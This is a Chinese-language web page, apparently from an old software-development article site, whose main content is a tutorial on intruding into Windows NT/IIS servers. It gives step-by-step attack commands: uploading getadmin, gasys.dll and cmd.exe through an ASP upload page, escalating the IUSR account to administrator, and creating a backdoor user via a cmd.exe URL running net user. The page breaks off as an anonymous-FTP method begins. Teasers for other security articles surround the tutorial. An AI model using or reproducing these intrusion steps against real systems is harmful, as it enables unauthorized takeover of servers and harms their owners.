当前位置:首页 » 软件开发
开发技术指南» 文章正文
    引言: 1. 如果你有NT/IIS服务器的任何一个帐号,哪怕是guest帐号,都可以获得Administrator权限; 2. 用netcat和iishack可以获得Administrator; 3. iusr_计算机名这个帐号有ftp上传、web执行等权限; 4. 在web server...
 

 

 ·服务器如何防范asp木马    »显示摘要«
    摘要: 随着asp 技术的发展,网络上基于asp技术开发的网站越来越多,对asp技术的支持可以说已经是windows系统iis服务器的一项基本功能。但是基于asp技术的木马后门,也越来越多,而且功能也越来越强大。由于asp它本身是服务器提供的一贡服务功能,所以这种asp脚本的木马后门,不会被杀毒软件查杀。被黑客们称为“永远不会被查杀的后门”。由于其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威......
    摘要:   从1988年开始,位于美国卡内基梅隆大学的cert cc(计算机紧急响应小组协调中心)就开始调查入侵者的活动。cert cc给出一些关于最新入侵者攻击方式的趋势。   趋势一:攻击过程的自动化与攻击工具的快速更新   攻击工具的自动化程度继续不断增强。自动化攻击涉及到的四个阶段都发生了变化。 1. 扫描潜在的受害者。从1997年起开始出现大量的扫描活动。目前,新的扫描工具利用更......


入侵NTserver典型途径攻击基础

  1. 如果你有nt/iis服务器的任何一个帐号,哪怕是guest帐号,都可以获得administrator权限;

  2. 用netcat与iishack可以获得administrator; 【程序编程相关:x-scan扫描中---Nessus攻击

【推荐阅读:“漏洞攻击程序”是这样编译出来的

  3. iusr_计算机名这个帐号有ftp上传.web执行等权限; 【扩展信息:黑客扫描特征及易受攻击的端口

  4. 在web server上执行程序是入侵nt的关键;

  5. 要在web server上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去.

  在本文中,目标机器的名称是ntsvr2,目标机器的域名是www.xxx.com,目标机器上有scripts与cgi-bin目录,scripts目录下有uploadn.asp等asp程序,可能有guest帐号,肯定有iusr_ntsvr2这个帐号.

  第一个方法:用iusr_ntsvr2或者guest这两个帐号(这里假设我们已经破解了这个帐号的密码),在浏览器输入:

 http://www.xxx.com/scripts/uploadn.asp

  guest与iusr_ntsvr2这两个帐号都可以进这个asp页面.

  在这里把文件getadmin与gasys.dll以及cmd.exe上传到/scripts目录,然后输入:

 http://www.xxx.com/scripts/getadmin.exe?iusr_ntsvr2

  大约十多秒后屏幕显示:

  cgi error

  这时有90%的可能是你已经把iusr_ntsvr2升级为administrator,也就是任何访问该web站的人都是管理员.

  下面可以add user:

 http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

  这样就创建了一个叫china用户,密码是news,然后:

 http://www.xxx.com/scripts/getadmin.exe?china

  第二个方法:用匿名ftp

  如果允许匿名帐号ftp登陆的设定,也给我们带来了突破nt server的机会.我们用ftp登陆一个nt

server,比如:www.xxx.com(示例名):

  c:\> ftp www.xxx.com


...   下一页
 ·小规模ddos用freebsd+ipfw搞定    »显示摘要«
    摘要:   编者按:本文讨论的方法只是针对小规模的恶意攻击比较有效。   笔者公司共有10台web服务器,使用redhat linux 9作为操作系统,分布在全国各大城市,主要为用户提供http服务。曾经有一段时间不少用户反映有的服务器访问速度缓慢,甚至不能访问,检查后发现是受到了ddos攻击(分布式拒绝服务攻击)。由于服务器分布太散,不能采用硬件防火墙的方案,虽然iptables功能很强大,足以......
» 本期热门文章:

©2000-2007 All Rights Reserved. 最佳浏览:1024X768 MSIE